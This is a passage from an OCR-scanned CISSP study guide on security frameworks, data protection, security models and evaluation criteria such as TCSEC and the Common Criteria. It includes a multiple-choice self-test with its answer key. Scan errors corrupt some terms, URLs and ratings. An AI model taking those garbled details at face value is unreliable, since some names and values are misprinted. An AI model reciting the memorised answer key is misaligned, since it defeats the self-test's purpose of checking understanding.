Note that the title of ISO 27002 includes the word “techniques”; ISO 27001 
includes the word “requirements.” Simply put, ISO 27002 describes information 
security best practices (Techniques), and ISO 27001 describes a process for auditing 
(requirements) those best practices. 

COBIT 

COBIT (Control Objectives for Information and related Technology) is a control 
framework for employing information security governance best practices within an 
organization. COBIT was developed by ISACA (Information Systems Audit and 
Control Association, see http://www.isaca.org). 

According to ISACA, “the purpose of COBIT is to provide management and 
business process owners with an information technology (IT) governance model that 
helps in delivering value from IT and understanding and managing the risks associ- 
ated with IT. COBIT helps bridge the gaps amongst business requirements, control 
needs and technical issues. It is a control model to meet the needs of IT governance 
and ensure the integrity of information and information systems.” [12] 

COBIT has four domains: Plan and Organize, Acquire and Implement, Deliver 
and Support, and Monitor and Evaluate. There are 34 Information Technology 
processes across the four domains. More information about COBIT is available at: 
http://www.isaca.org/Knowledge-Center/COBIT/Pages/Overview.aspx. Version 4. 1 
was released in 2007; Version 5 was released in April 2012. 

ITIL® 

ITIL® (Information Technology Infrastructure Library) is a framework for providing 
best services in IT Service Management (ITSM). More information about ITIL® is 
available at: http://www.itil-ofhcialsite.com. 

ITIL® contains five “Service Management Practices — Core Guidance” publications: 

• Service Strategy 

• Service Design 

• Service Transition 

• Service Operation 

• Continual Service Improvement 

Service Strategy helps IT provide services. Service Design details the infrastruc- 
ture and architecture required to deliver IT services. Service transition describes 
taking new projects and making them operational. Service Operation covers IT 
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operations controls. Finally, continual service improvement describes ways to 
improve existing IT services. 


SCOPING AND TAILORING 

Scoping is the process of determining which portions of a standard will be employed 
by an organization. For example: an organization that does not employ wireless 
equipment may declare the wireless provisions of a standard are out of scope, and 
therefore do not apply. 

Tailoring is the process of customizing a standard for an organization. It begins 
with controls selection, continues with scoping, and finishes with the application 
of compensating controls. NIST Special Publication 800-53 (Security and Privacy 
Controls for Federal Information Systems and Organizations) describes the tailoring 
process: 

• “Identifying and designating common controls in initial security control 
baselines; 

• Applying scoping considerations to the remaining baseline security controls; 

• Selecting compensating security controls, if needed; 

• Assigning specific values to organization-defined security control parameters 
via explicit assignment and selection statements; 

• Supplementing baselines with additional security controls and control 
enhancements, if needed; and 

• Providing additional specification information for control implementation, if 
needed.” [13] 

The “parameters” mentioned include items such as password complexity policies. 


PROTECTING DATA IN MOTION AND DATA AT REST 

Data at rest is stored data: residing on a disk and/or in a file. Data in motion is 
data that is being transferred across a network. Each form of data requires different 
controls for protection, which we will discuss next. 

Drive and Tape Encryption 

Drive and tape encryption protect data at rest, and are one of the few controls that 
will protect data after physical security has been breached. These controls are rec- 
ommended for all mobile devices and media containing sensitive information that 
may physically leave a site or security zone. Encryption may also be used for static 
systems that are not typically moved (such as file servers). 

Whole-disk encryption of mobile device hard drives is recommended. Partially 
encrypted solutions, such as encrypted file folders or partitions, often risk exposing 
sensitive data stored in temporary files, unallocated space, swap space, etc. 

Disk encryption/decryption may occur in software or hardware. Software-based 
solutions may tax the computer’s performance, while hardware-based solutions 
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offload the cryptographic work onto another CPU, such as the hardware disk 
controller. 

Many breach notification laws concerning Personally Identifiable Information 
(PII) contain exclusions for lost data that is encrypted. An example is the 2009 update 
to the U.S. Health Insurance Portability and Accountability Act (HIPAA) concerning 
breaches of electronic Protected Healthcare Information (ePHI). 

Breach of unencrypted ePHI requires notification to the affected individuals; 
breaches of more than 500 individuals’ data require additional notification to the 
press and the U.S. Department of Health and Human Services. Encrypted data is 
excluded from these rules: “secure health information as specified by the guidance 
through encryption or destruction are relieved from having to notify in the event of a 
breach of such information.” [5] 


EXAM WARNING 


Note that while HIPAA is in the Common Body of Knowledge (CBK), these specific details are 
not. This point is raised to highlight the criticality of encrypting PII on mobile devices, regardless of 
industry. 


Media Storage and Transportation 

All sensitive backup data should be stored offsite, whether transmitted offsite via 
networks, or physically moved as backup media. Sites using backup media should 
follow strict procedures for rotating media offsite. 

Always use a bonded and insured company for offsite media storage. The com- 
pany should employ secure vehicles and store media at a secure site. Ensure that 
the storage site is unlikely to be impacted by the same disaster that may strike the 
primary site, such as a flood, earthquake, or fire. Never use informal practices, such 
as storing backup media at employees' houses. 


LEARN BY EXAMPLE 

Offsite Backup Storage 

The importance of strong policy and procedures regarding offsite backup media storage is 
illustrated by the massive loss of PII by the State of Ohio in June 2007. The breach was initially 
announced as affecting 64,000 State of Ohio employees; it was later discovered that over 800,000 
records (most were not state employees) were lost. 

Ohio’s electronic data standards required offsite storage of one set of backup tapes. The 
Ohio Administrative Knowledge System met the standard via an informal arrangement, where 
an employee would take a set of tapes and store them at home. This ill-advised practice had 
been in use for over 2 years when it led to the loss of PII when an intern’s car was broken into, 
and the tapes were stolen. See http://www.technewsworld.com/story/57968.html for more 
information. 

While offsite storage of backup data is recommended, always use a professional bonded service. 
Encrypting backup data adds an extra layer of protection. 
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Protecting Data in Motion 

Data in motion is best protected via standards-based end-to-end encryption, such as 
IPSEC VPN. This includes data sent over untrusted networks such as the Internet, 
but VPNs may also be used as an additional defense-in-depth measure on internal 
networks such as a private corporate WAN, or private circuits such as Tls leased 
from a service provider. We will discuss VPNs and various types of circuits in more 
detail in Chapter 5, Domain 4: Communications and Network Security. 


SUMMARY OF EXAM OBJECTIVES 

In this domain we discussed the concept of data classification, in use for millennia. 
We discussed the roles required to protect data, including business or mission owners, 
data owners, system owners, custodians and users. 

An understanding of the remanence properties of volatile and nonvolatile memory 
and storage mediums are critical security concepts to master. We discussed RAM, 
ROM, types of PROMS, flash memory, and Solid State Drives (SSDs), including 
remanence properties and secure destruction methods. Finally, we discussed 
well-known standards, including PCI-DSS and the ISO 27000 series, as well as 
standards processes including scoping and tailoring. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . What type of memory is used often for CPU registers? 

A. DRAM 

B. Firmware 

C. ROM 

D. SRAM 

2. What type of firmware is erased via ultraviolet light? 

A. EPROM 

B. EEPROM 

C. Flash memory 

D. PROM 

3. What describes the process of determining which portions of a standard will be 
employed by an organization? 

A. Baselines 

B. Policies 

C. Scoping 

D. Tailoring 
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4 . What nonvolatile memory normally stores the operating system kernel on an 
IBM PC-compatible system? 

A. Disk 

B. Firmware 

C. RAM 

D. ROM 

5 . What was ISO 17799 renamed as? 

A. BS 7799-1 

B. ISO 27000 

C. ISO 27001 

D. ISO 27002 

6 . Which of the following describes a duty of the Data Owner? 

A. Patch systems 

B. Report suspicious activity 

C. Ensure their files are backed up 

D. Ensure data has proper security labels 

7 . Which control framework has 34 processes across four domains? 

A. COSO 

B. COBIT 

C. ITIL® 

D. OCTAVE® 

8. Which phase of OCTAVE® identifies vulnerabilities and evaluates safeguards? 

A. Phase 1 

B. Phase 2 

C. Phase 3 

D. Phase 4 

9 . Which of the following is the best method for securely removing data from a 
Solid State Drive that is not physically damaged? 

A. ATA secure erase 

B. Bit-level overwrite 

C. Degaussing 

D. File shredding 

1 0. The release of what type of classified data could lead to “exceptionally grave 
damage to the national security”? 

A. Confidential 

B. Secret 

C. Sensitive but Unclassified (SBU) 

D. Top Secret 

11. A company outsources payroll services to a 3 rd party company. Which of the 
following roles most likely applies to the 3 rd party payroll company? 

A. Data controller 

B. Data hander 

C. Data owner 

D. Data processor 
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1 2. Which managerial role is responsible for the actual computers that house data, 
including the security of hardware and software configurations? 

A. Custodian 

B. Data owner 

C. Mission owner 

D. System owner 

1 3. What method destroys the integrity of magnetic media such as tapes or disk 
drives by exposing them to a strong magnetic field, destroying the integrity of 
the media and the data it contains? 

A. Bit-level overwrite 

B. Degaussing 

C. Destruction 

D. Shredding 

1 4. What type of relatively expensive and fast memory uses small latches called 
“flip-flops” to store bits? 

A. DRAM 

B. EPROM 

C. SRAM 

D. SSD 

1 5. What type of memory stores bits in small capacitors (like small batteries)? 

A. DRAM 

B. EPROM 

C. SRAM 

D. SSD 


SELF TEST QUICK ANSWER KEY 


1 . 

D 

2. 

A 

3. 

C 

4. 

A 

5. 

D 

6. 

D 

7. 

B 

8 . 

B 

9. 

A 

10 . 

D 

11. 

D 

12 . 

D 

13. 

B 

14. 

C 

15. 

A 
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CHAPTER 


Domain 3: Security 
Engineering (Engineerin 
and Management of 
Security) 

EXAM OBJECTIVES IN THIS CHAPTER 

• Security Models 

• Evaluation Methods, Certification and Accreditation 

• Secure System Design Concepts 

• Secure Hardware Architecture 

• Secure Operating System and Software Architecture 

• Virtualization and Distributed Computing 

• System Vulnerabilities, Threats and Countermeasures 

• Cornerstone Cryptographic Concepts 

• History of Cryptography 

• Types of Cryptography 

• Cryptographic Attacks 

• Implementing Cryptography 

• Perimeter Defenses 

• Site Selection, Design, and Configuration 

• System Defenses 

• Environmental Controls 



UNIQUE TERMS AND DEFINITIONS 

• Asymmetric Encryption — encryption that uses two keys: if you encrypt with 
one you may decrypt with the other 

• Hash Function — one-way encryption using an algorithm and no key 

• Hypervisor — Allows multiple virtual operating system guests to run on one host 

• Mantrap — A preventive physical control with two doors. Each door requires a 
separate form of authentication to open 

• Tailgating — Following an authorized person into a building without providing 
credentials 
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• TCSEC — Trusted Computer System Evaluation Criteria, also known as the 
Orange Book 

• Symmetric Encryption — encryption that uses one key to encrypt and decrypt 


INTRODUCTION 

The Security Engineering domain is an example of the 2015 exam’s reordering and 
combining concepts from the 10 domains of the old exam to the current 8 domains. 
This domain contains large swaths of three formerly separate domains: Security 
Architecture, Cryptography, and Physical Security. As a result: this domain is quite 
large, and bursting with content. 

As mentioned in Chapter 1, Introduction: the new order doesn’t always flow logi- 
cally, but that is not important for exam success. In the end you will face 250 ques- 
tions from all 8 domains, and questions will not overtly reference their domain of 
origin. 

This domain begins with security architecture concepts, including security 
models, as well as secure system components in hardware and software. Next 
comes cryptography, including core concepts of symmetric encryption, asymmetric 
encryption, and hash functions. Finally, we will discuss physical security, where 
we will learn that safety of personnel is paramount. 


SECURITY MODELS 

Security models provide “rules of the road” for securely operating systems. The 
canonical example is Bell-LaPadula, which includes “No Read Up” (NRU), also 
known as the Simple Security Property. This is the rule that forbids a secret-cleared 
subject from reading a top secret object. While Bell-LaPadula is focused on protecting 
confidentiality, other models, such as Biba, are focused on integrity. 

READING DOWN AND WRITING UP 

The concepts of reading down and writing up apply to Mandatory Access Control 
models such as Bell-LaPadula. Reading down occurs when a subject reads an object 
at a lower sensitivity level, such as a top secret subject reading a secret object. 
Figure 4. 1 shows this action. 

There are instances when a subject has information and passes that information 
up to an object, which has higher sensitivity than the subject has permission to access. 
This is called “writing up” because the subject does not see any other information 
contained within the object. 

Writing up may seem counterintuitive. As we will see shortly, these rules protect 
confidentiality, often at the expense of integrity. Imagine a secret-cleared agent in the 
field uncovers a terrorist plot. The agent writes a report, which contains information 
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FIGURE 4.1 Reading Down FIGURE 4.2 Writing Up 


that risks exceptionally grave damage to national security. The agent therefore labels 
the report top secret (writes up). Figure 4.2 shows this action. The only difference 
between reading up and writing down is the direction that information is being 
passed. It is a subtle but important distinction for the CISSP® exam. 


NOTE 

The U.S. Central Intelligence Agency, or any other government clandestine organization, 
operates intelligence collection using the write up concept. Agents go out, collect small bits of 
intelligence data, and then send that data back to headquarters. Only at headquarters, once the 
data has been assembled and examined in its entirety, will the true usefulness and value of the 
data come forth. The sensitivity of the final object will be much higher than the level of access of 
any of the agents. 


STATE MACHINE MODEL 

A state machine model is a mathematical model that groups all possible system 
occurrences, called states. Every possible state of a system is evaluated, showing 
all possible interactions between subjects and objects. If every state is proven to 
be secure, the system is proven to be secure. 

State machines are used to model real-world software when the identified state 
must be documented along with how it transitions from one state to another. For 
example, in object-oriented programming, a state machine model may be used to 
model and test how an object moves from an inactive state to an active state readily 
accepting input and providing output. 
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BELL-LAPADULA MODEL 

The Bell-LaPadula model was originally developed for the U.S. Department of 
Defense. It is focused on maintaining the confidentiality of objects. Protecting 
confidentiality means not allowing users at a lower security level to access objects at 
a higher security level. Bell-LaPadula operates by observing two rules: the Simple 
Security Property and the * Security Property. 

Simple Security Property 

The Simple security property states that there is “no read up:” a subject at a specific 
classification level cannot read an object at a higher classification level. Subjects 
with a Secret clearance cannot access Top Secret objects, for example. 

* Security Property (Star Security Property) 

The * Security Property is “no write down:” a subject at a higher classification level 
cannot write to a lower classification level. For example: subjects who are logged 
into a Top Secret system cannot send emails to a Secret system. 

Strong and Weak Tranquility Property 

Within the Bell-LaPadula access control model, there are two properties that dic- 
tate how the system will issue security labels for objects. The Strong Tranquility 
Property states that security labels will not change while the system is operating. The 
Weak Tranquility Property states that security labels will not change in a way that 
conflicts with defined security properties. 

LATTICE-BASED ACCESS CONTROLS 

Lattice-based access control allows security controls for complex environments. 
For every relationship between a subject and an object, there are defined upper and 
lower access limits implemented by the system. This lattice, which allows reaching 
higher and lower data classification, depends on the need of the subject, the label of 
the object, and the role the subject has been assigned. Subjects have a Least Upper 
Bound (LUB) and Greatest Lower Bound (GLB) of access to the objects based on 
their lattice position. Figure 4.3 shows an example of a lattice-based access control 
model. At the highest level of access is the box labeled, “{Alpha, Beta, Gamma}.” 
A subject at this level has access to all objects in the lattice. 

At the second tier of the lattice, we see that each object has a distinct upper and lower 
allowable limit. For example, assume a subject has “{Alpha, Gamma}” access. The only 
viewable objects in the lattice would be the “Alpha” and “Gamma” objects. Both rep- 
resent the greatest lower boundary. The subject would not be able to view object Beta. 

INTEGRITY MODELS 

Models such as Bell-LaPadula focus on confidentiality, sometimes at the expense of 
integrity. The Bell-LaPadula “No Write Down” rule means subjects can write up: 
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The Lattice 



FIGURE 4.3 Lattice-Based Access Control 


a Secret subject can write to a Top Secret object. What if the Secret subject writes 
erroneous information to a Top Secret object? Integrity models such as Biba address 
this issue. 

Biba Model 

While many governments are primarily concerned with confidentiality, most busi- 
nesses desire to ensure that the integrity of the information is protected at the highest 
level. Biba is the model of choice when integrity protection is vital. The Biba model, 
named after Kenneth J. Biba, has two primary rules: the Simple Integrity Axiom and 
the * Integrity Axiom. 

Simple Integrity Axiom 

The Simple Integrity Axiom is “no read down:” a subject at a specific classification 
level cannot read data at a lower classification. This prevents subjects from access- 
ing information at a lower integrity level. This protects integrity by preventing bad 
information from moving up from lower integrity levels. 

* Integrity Axiom 

The * Integrity Axiom is “no write up:” a subject at a specific classification level 
cannot write to data at a higher classification. This prevents subjects from passing 
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information up to a higher integrity level than they have clearance to change. This 
protects integrity by preventing bad information from moving up to higher integrity 
levels. 


NOTE 

Biba takes the Bell-LaPadula rules and reverses them, showing how confidentiality and integrity 
are often at odds. If you understand Bell LaPadula (no read up; no write down), you can extrapolate 
Biba by reversing the rules: no read down; no write up. 


Clark- Wilson 

Clark-Wilson is a real-world integrity model that protects integrity by requiring sub- 
jects to access objects via programs. Because the programs have specific limitations 
to what they can and cannot do to objects, Clark-Wilson effectively limits the 
capabilities of the subject. Clark-Wilson uses two primary concepts to ensure that 
security policy is enforced: well-formed transactions and Separation of Duties. 

Well-Formed Transactions 

Well-Formed Transactions describe the Clark-Wilson ability to enforce control over 
applications. This process is comprised of the “access control triple:” user, transfor- 
mation procedure, and constrained data item. 

A transformation procedure (TP) is a well-formed transaction, and a constrained 
data item (CDI) is data that requires integrity. Unconstrained data items (UDI) are 
data that do not require integrity. Assurance is based upon integrity verification pro- 
cedures (IVPs) that ensure that data are kept in a valid state. 

For each TP, an audit record is made and entered into the access control system. 
This provides both detective and recovery controls in case integrity is lost. 

Certification, Enforcement and Separation of Duties 

Within Clark-Wilson, certification monitors integrity, and enforcement preserves 
integrity. All relations must meet the requirements imposed by the separation of 
duty. All TPs must record enough information to reconstruct the data transaction to 
ensure integrity. 


EXAM WARNING 


Clark-Wilson requires that users are authorized to access and modify data. It also requires that data 
is modified in only authorized ways. 


The purpose of separation of duties within the Clark-Wilson model is to ensure 
that authorized users do not change data in an inappropriate way. One example is a 
school’ s bursar office. One department collects money and another department issues 
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payments. Both the money collection and payment departments are not authorized 
to initiate purchase orders. By keeping all three roles separate, the school is assured 
that no one person can fraudulently collect, order, or spend the school’s money. 
The school depends on the honesty and competency of each person in the chain to 
report any improper modification of an order, payment, or collection. It would take a 
conspiracy among all parties to conduct a fraudulent act. 


EXAM WARNING 


Clark-Wilson enforces the concept of a separation of duties and transformation procedures within 
the system. 


INFORMATION FLOW MODEL 

The Information Flow Model describes how information may flow in a secure sys- 
tem. Both Bell-LaPadula and Biba use the information flow model. Bell-LaPadula 
states “no read up” and “no write down.” Information flow describes how unclassi- 
fied data may be read up to secret, for example, and then written up to top secret. 
Biba reverses the information flow path to protect integrity. 

CHINESE WALL MODEL 

The Chinese Wall model is designed to avoid conflicts of interest by prohibiting one 
person, such as a consultant, from accessing multiple conflict of interest categories 
(Cols). It is also called Brewer-Nash, named after model creators Dr. David Brewer 
and Dr. Michael Nash, and was initially designed to address the risks inherent with 
employing consultants working within banking and financial institutions. [1] 

Conflicts of interest pertain to accessing company-sensitive information from dif- 
ferent companies that are in direct competition with one another. If a consultant had 
access to competing banks’ profit margins, he or she could use that information for 
personal gain. The Chinese Wall model requires that Cols be identified so that once a 
consultant gains access to one Col, they cannot read or write to an opposing Col. [2] 

NONINTERFERENCE 

The noninterference model ensures that data at different security domains remain 
separate from one another. By implementing this model, the organization can be 
assured that covert channel communication does not occur because the information 
cannot cross security boundaries. Each data access attempt is independent and has no 
connection with any other data access attempt. 

A covert channel is policy-violating communication that is hidden from the 
owner or users of a data system. There are unused fields within the TCP/IP headers, 
for example, which may be used for covert channels. These fields can also carry 
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covert traffic, along with encrypting payload data within the packet. Many kinds 
of malware use these fields as covert channels for communicating back to malware 
command and control networks. 

TAKE-GRANT 

The Take-Grant Protection Model contains rules that govern the interactions between 
subjects and objects, and permissions subjects can grant to other subjects. Rules 
include: take, grant, create, and remove. The rules are depicted as a protection graph 
that governs allowable actions. [3] Each subject and object would be represented on 
the graph. Figure 4.4 details a take-grant relationship between the users, Alice, Bob, 
and Carol with regards to each subject’s access to the object, “secret documents.” 
Subject Alice, who is placed in the middle of the graph, can create and remove (c, r) 
any privileges for the secret documents. Alice can also grant (g) user Carol any of 
these same privileges. User Bob can take (f) any of user Alice’s privileges. 

Take-Grant models can be very complex as relationships between subjects and 
objects are usually much more complex than the one shown here. 

ACCESS CONTROL MATRIX 

An access control matrix is a table that defines access permissions between specific 
subjects and objects. A matrix is a data structure that acts as a table lookup for the 
operating system. For example, Table 4. 1 is a matrix that has specific access permis- 
sions defined by user and detailing what actions they can enact. User rdeckard has 
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Table 4.1 User Access Permissions 


Users 

Data Access File # 1 

Data Creation Application 

rdeckard 

Read/Write 

Execute 

etyrell 

Read 

Execute 

rbatty 

None 

None 
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read/write access to the data file as well as access to the data creation application. 
User etyrell can read the data file and still has access to the application. User rbatty 
has no access within this data access matrix. 

The rows of Table 4.1 show the capabilities of each subject; each row is called 
a capability list. The columns of Table 4.1 show the ACL for each object or 
application. 

ZACHMAN FRAMEWORK FOR ENTERPRISE ARCHITECTURE 

The Zachman Framework for Enterprise Architecture provides six frameworks for 
providing information security, asking what, how, where, who, when, and why, and 
mapping those frameworks across rules including planner, owner, designer, builder, 
programmer, and user. These frameworks and roles are mapped to a matrix, as shown 
in Figure 4.5 [39]. 

GRAHAM-DENNING MODEL 

The Graham-Denning Model has three parts: objects, subjects, and rules. It provides 
a more granular approach for interaction between subjects and objects. There are 
eight rules: 

• Rl: Transfer Access 

• R2: Grant Access 



DATA 

What 

FUNCTION 

How 

NETWORK 

Where 

PEOPLE 

Who 

TIME 

When 

MOTIVATION 

Why 

Objective/Scope 

(contextual) 

Role: Planner 

List of things 
important in 
the business 

List of 

Business 

Processes 

List of 

Business 

Locations 

List of 

Important 

Organizations 

List of 

Events 

List of 

Business Goal 
& Strategies 

Enterprise Model 
(conceptual) 

Role: Owner 

Conceptual 
Data / 

Object Model 

Business 

Process 

Model 

Business 

Logistics 

System 

Work 

Flow 

Model 

Master 

Schedule 

Business 

Plan 

System Model 
(logical) 
Role:Designer 

Logical 

Data 

Model 

System 

Architecture 

Model 

Distributed 

Systems 

Architecture 

Human 

Interface 

Architecture 

Processing 

Structure 

Business 

Rule 

Model 

Technology Model 
(physical) 
Role:Builder 

Physical 

Data/Class 

Model 

Technology 

Design 

Model 

Technology 

Architecture 

Presentation 

Architecture 

Control 

Structure 

Rule 

Design 

Detailed Reprentation 
(out of context) 

Role: Programmer 

Data 

Definition 

Program 

Network 

Architecture 

Security 

Architecture 

Timing 

Definition 

Rule 

Speculation 

Functioning 

Enterprise 

Role: User 

Usable 

Data 

Working 

Function 

Usable 

Network 

Functioning 

Organization 

Implemented 

Schedule 

Working 

Strategy 


FIGURE 4.5 Zachman Framework 


112 CHAPTER 4 Doma in 3: Security Engineering 


• R3: Delete Access 

• R4: Read Object 

• R5: Create Object 

• R6: Destroy Object 

• R7: Create Subject 

• R8: Destroy Subject [4] 

HARRISON-RUZZO-ULLMAN MODEL 

The Harrison-Ruzzo-Ullman (HRU) Model maps subjects, objects, and access rights 
to an access matrix. It is considered a variation to the Graham-Denning Model. HRU 
has six primitive operations: 

• Create object 

• Create subject 

• Destroy subject 

• Destroy object 

• Enter right into access matrix 

• Delete right from access matrix [5] 

In addition to HRU’s different operations, it also differs from Graham-Denning 
because it considers subjects to be also objects. 

MODES OF OPERATION 

Defining the Mode of Operation necessary for an IT system will greatly assist in 
identifying the access control and technical requirements that system must have. 
Depending on the Mode of Operation, it may use a discretionary access control 
implementation or a mandatory access control implementation. 

There are four Modes of Operation: 

1 . Dedicated 

2 . System High 

3 . Compartmented 

4 . Multilevel 

Dedicated 

Dedicated mode of operation means that the system contains objects of one clas- 
sification label (e.g., secret) only. All subjects must possess a clearance equal to or 
greater than the label of the objects (a secret or higher clearance, using the previous 
example). Each subject must have the appropriate clearance, formal access approval, 
and need to know for all the information stored and processed on the system. 

System High 

In a system high mode of operation, the system contains objects of mixed labels (e.g., 
confidential, secret, and top secret). All subjects must possess a clearance equal to 
the system's highest object (top secret, using the previous example). 
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Compartmented 

In a compartmented mode of operation system, all subjects accessing the system 
have the necessary clearance but do not have the appropriate formal access approval, 
nor need to know for all the information found on the system. Objects are placed into 
“compartments,” and require a formal (system-enforced) need to know to access. 
Compartmented mode systems use technical controls to enforce need to know (as 
opposed to a policy-based need to know). 

Multilevel 

Multilevel mode of operation stores objects of differing sensitivity labels, and allows 
system access by subjects with differing clearances. The reference monitor mediates 
access between subjects and objects: if a top secret subject (with a need to know) 
accesses a top secret object, access is granted. If a secret subject attempts to access a 
top secret object, access is denied. 


EVALUATION METHODS, CERTIFICATION AND 
ACCREDITATION 

Evaluation methods and criteria are designed to gauge the real-world security of 
systems and products. The Trusted Computer System Evaluation Criteria (TCSEC, 
aka the Orange Book) is the granddaddy of evaluation models, developed by the 
U.S. Department of Defense in the 1980s. Other international models have followed, 
including ITSEC and the Common Criteria. 

When choosing security products, how do you know which is best? How can a 
security professional know that the act of choosing and using a specific vendor’s 
software will not introduce malicious code? How can a security professional know 
how well the software was tested and what the results were? TCSEC, ITSEC, and the 
Common Criteria were designed to answer those questions. 

THE ORANGE BOOK 

The National Computer Security Center (NCSC), part of the National Institute of 
Standards and Technology (NIST), with help from the National Security Agency 
(NSA) developed the Trusted Computer System Evaluation Criteria (TCSEC) in 
1983. This publication is also known as the “ Orange Book ” due to the fact that when 
it was first published, it had a bright orange cover. It was one of the first security 
standards implemented, and major portions of those standards are still used today in 
the form of U.S. Government Protection Profiles within the International Common 
Criteria framework. 

TCSEC may be downloaded from http://csrc.nist.gov/publications/history/ 
dod85.pdf. Division D is the lowest form of security, and A is the highest. The TC- 
SEC divisions (denoted with a single letter, like “C”) and classes (denoted with a 
letter and number, like “B2”) are: 

• D: Minimal Protection 

• C: Discretionary Protection 
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• Cl: Discretionary Security Protection 

• C2: Controlled Access Protection 

• B : Mandatory Protection 

• B 1 : Labeled Security Protection 

• B2: Structured Protection 

• B3: Security Domains 

• A: Verified Protection 

• Al: Verified Design [6] 

The Orange Book was the first significant attempt to define differing levels of 
security and access control implementation within an IT system. This publication was 
the inspiration for the Rainbow Series, a series of NCSC publications detailing specif- 
ic security standards for various communications systems. It was called the Rainbow 
Series because each publication had a different color cover page. There are over 35 
different security standards within the Rainbow series and they range widely in topic. 


NOTE 

TCSEC is old (dating to the 1980s), and no longer actively used. It is still used as a reference for 
other models such as ITSEC, as we will see shortly in the “ITSEC” section. Despite rumors to 
the contrary, TCSEC is still testable, though less specific knowledge (such as specific differences 
between classes in the same division) is required for the exam. 


The TCSEC Divisions 

TCSEC Division D is Minimal Protection. This division describes TCSEC-evaluated 
systems that do not meet the requirements of higher divisions (C through A). 

TCSEC Division C is Discretionary Protection. “Discretionary” means Discre- 
tionary Access Control systems (DAC). Division C includes classes Cl (Discretion- 
ary Security Protection) and C2 (Controlled Access Protection). 

TCSEC Division B is Mandatory Protection. “Mandatory” means Mandatory 
Access Control systems (MAC). Division B includes classes B1 (Labeled Security 
Protection), B2 (Structured Protection) and B3 (Security Domains). Higher numbers 
are more secure: B3 is more secure than Bl. 

TCSEC Division A is Verified Protection, with a single class Al (Verified 
Design). Al contains everything class B3, plus additional controls. 

TNI/Red Book 

The Trusted Network Interpretation (TNI) brings TCSEC concepts to network 
systems. It is often called the “red book,” due to the color of its cover. Note that 
TCSEC (orange book) does not address network issues. 

ITSEC 

The European Information Technology Security Evaluation Criteria (ITSEC) was 
the first successful international evaluation model. It refers to TCSEC Orange Book 
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levels, separating functionality (F, how well a system works) from assurance (the 
ability to evaluate the security of a system). There are two types of assurance: effec- 
tiveness (Q) and correctness (E). [7] 

Assurance correctness ratings range from EO (inadequate) to E6 (formal model 
of security policy); Functionality ratings range include TCSEC equivalent ratings 
(F-Cl, F-C2, etc.). The equivalent ITSEC/TCSEC ratings are: 

• EO: D 

• F-C1.E1: Cl 

• F-C2.E2: C2 

• F-B1.E3: B1 

• F-B2.E4: B2 

• F-B3,E5: B3 

• F-B3,E6: At 

Additional functionality ratings include: 

• F-IN: Fligh integrity requirements 

• AV : High availability requirements 

• DI: High integrity requirements for networks 

• DC: High confidentiality requirements for networks 

• DX: High integrity and confidentiality requirements for networks 

See: http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf for more 
information about ITSEC. 


THE INTERNATIONAL COMMON CRITERIA 

The International Common Criteria is an internationally agreed upon stan- 
dard for describing and testing the security of IT products. It is designed to 
avoid requirements beyond current state of the art and presents a hierarchy of 
requirements for a range of classifications and systems. The Common Criteria 
is the second major international information security criteria effort, following 
ITSEC. The Common Criteria uses ITSEC terms such as Target of Evaluation 
and Security Target. 

The Common Criteria was developed with the intent to evaluate commercially 
available as well as government-designed and built IA and IA-enabled IT products. 
A primary objective of the Common Criteria is to eliminate known vulnerabilities of 
the target for testing. 

Common Criteria Terms 

The Common Criteria uses specific terms when defining specific portions of the test- 
ing process. 

• Target of Evaluation (ToE): the system or product that is being evaluated 

• Security Target (ST): the documentation describing the TOE, including the 
security requirements and operational environment 
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• Protection Profile (PP): an independent set of security requirements and 
objectives for a specific category of products or systems, such as firewalls or 
intrusion detection systems 

• Evaluation Assurance Level (EAL): the evaluation score of the tested product or 
system 

Levels of Evaluation 

Within the Common Criteria, there are seven EALs; each builds on the level of in- 
depth review of the preceding level. [8] For example, EAL 3-rated products can be 
expected to meet or exceed the requirements of products rated EAL1 or EAL2. 

The EAL levels are described in “Common Criteria for Information Technol- 
ogy Security Evaluation, Part 3: Security assurance components.” (July 2009, Ver- 
sion 3.1, Revision 3, Final, available at: http://www.commoncriteriaportal.org/files/ 
ccfiles/CCP ART3V3.1R3.pdf). The levels are: 

• EAL1: Functionally tested 

• EAL2: Structurally tested 

• EAL3: Methodically tested and checked 

• EAL4: Methodically designed, tested, and reviewed 

• EAL5: Semi-formally designed, and tested 

• EAL6: Semi-formally verified, designed, and tested 

• EAL7: Formally verified, designed, and tested [9] 


SECURE SYSTEM DESIGN CONCEPTS 

Secure system design transcends specific hardware and software implementations 
and represents universal best practices. 

LAYERING 

Layering separates hardware and software functionality into modular tiers. The com- 
plexity of an issue such as reading a sector from a disk drive is contained to one layer 
(the hardware layer in this case). One layer (such as the application layer) is not 
directly affected by a change to another. Changing from an IDE (Integrated Drive 
Electronics) disk drive to a SCSI (Small Computer System Interface) drive has no 
effect on an application that saves a file. Those details are contained within one layer, 
and may affect the adjoining layer only. 

The OSI model (which we will discuss in Chapter 5, Domain 4: Communication 
and Network Security) is an example of network layering. Unlike the OSI model, the 
layers of security architecture do not have standard names that are universal across 
all architectures. A generic list of security architecture layers is as follows: 

1 . Hardware 

2. Kernel and device drivers 
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3 . Operating System 

4 . Applications 

In our previous IDE — > SCSI drive example, the disk drive in the hardware layer 
has changed from IDE to SCSI. The device drivers in the adjacent layer will also 
change. Other layers, such as the applications layer, remain unchanged. 

ABSTRACTION 

Abstraction hides unnecessary details from the user. Complexity is the enemy of 
security: the more complex a process is, the less secure it is. That said: computers 
are tremendously complex machines. Abstraction provides a way to manage that 
complexity. 

A user double-clicks on an MP3 file containing music, and the music plays via 
the computer speakers. Behind the scenes, tremendously complex actions are taking 
place: the operating system opens the MP3 file, looks up the application associated 
with it, and sends the bits to a media player. The bits are decoded by a media player, 
which converts the information into a digital stream, and sends the stream to the 
computer’s sound card. The sound card converts the stream into sound, sent to the 
speaker output device. Finally, the speakers play sound. Millions of calculations are 
occurring as the sound plays, while low-level devices are accessed. 

Abstraction means the user simply presses play and hears music. 

SECURITY DOMAINS 

A security domain is the list of objects a subject is allowed to access. More broadly 
defined, domains are groups of subjects and objects with similar security require- 
ments. Confidential, Secret, and Top Secret are three security domains used by 
the U.S. Department of Defense (DoD), for example. With respect to kernels, two 
domains are user mode and kernel mode. 

Kernel mode (also known as supervisor mode) is where the kernel lives, allow- 
ing low-level access to memory, CPU, disk, etc. It is the most trusted and powerful 
part of the system. User mode is where user accounts and their processes live. The 
two domains are separated: an error or security lapse in user mode should not affect 
